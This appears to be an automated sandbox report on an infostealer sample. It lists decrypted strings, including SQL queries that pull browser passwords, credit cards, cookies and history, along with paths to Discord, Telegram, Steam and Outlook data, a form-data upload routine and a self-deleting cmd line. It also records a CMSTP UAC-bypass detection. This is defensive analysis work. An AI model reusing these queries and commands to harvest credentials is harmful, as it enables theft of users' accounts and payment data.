Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: StrStrA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RmStartSession
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RmGetList
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: RmEndSession
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: encrypted_key
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: PATH
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: NSS_Init
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: browser:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: profile:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: url:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: login:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: password:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Opera
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: OperaGX
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Network
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: cookies
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: .txt
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: TRUE
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: FALSE
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: autofill
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: history
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: name:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: month:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: year:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: card:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Cookies
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Login Data
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Web Data
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: History
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: logins.json
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: usernameField
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: guid
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: places.sqlite
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: plugins
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: IndexedDB
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Opera Stable
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: CURRENT
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Local State
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: profiles.ini
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: chrome
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: opera
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: firefox
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: wallets
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ProductName
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ProcessorNameString
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: DisplayName
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Network Info:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: System Summary:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - HWID:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - OS:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Architecture:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - UserName:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Local Time:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - UTC:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Language:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Laptop:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Running Path:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - CPU:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Threads:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Cores:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - RAM:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: - GPU:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: User Agents:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: All Users:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Current User:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Process List:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: system_info.txt
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: nss3.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \Temp\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: .exe
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: runas
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: open
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: /c start
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: %RECENT%
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: *.lnk
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: files
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \discord\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: key_datas
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: map*
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Telegram
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: *.tox
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: *.ini
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Password
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: 00000001
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: 00000002
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: 00000003
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: 00000004
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Pidgin
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \.purple\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: accounts.xml
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: token:
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: SteamPath
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \config\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ssfn*
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: config.vdf
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \Steam\
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: browsers
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: done
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: soft
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: https
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: POST
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: hwid
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: build
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: token
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: file_name
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: file
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: message
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C016C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6C016C80
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C99A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6C99A9A0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9944C0 PK11_PubEncrypt,	1_2_6C9944C0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C964420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	1_2_6C964420
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C994440 PK11_PrivDecrypt,	1_2_6C994440
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	1_2_6C9E25B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C97E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	1_2_6C97E6E0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C99A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	1_2_6C99A650
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C978670 PK11_ExportEncryptedPrivKeyInfo,	1_2_6C978670
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	1_2_6C9BA730
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9C0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	1_2_6C9C0180
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006F4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	2_2_006F4280
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_006F45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	2_2_006F45A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 2.2.run.exe.3a2fd5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.3a2f15b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.5427976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.run.exe.3e5286d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5472264.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.39eb86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5472e64.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.546b264.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.run.exe.3e96d5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.run.exe.3e9615b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.546be64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.542e976.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 2004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 7872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Unpacked PE file: 0.2.g77dRQ1Csm.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Unpacked PE file: 1.2.u42w.0.exe.400000.0.unpack

Source: g77dRQ1Csm.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 169.150.236.97:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49762 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
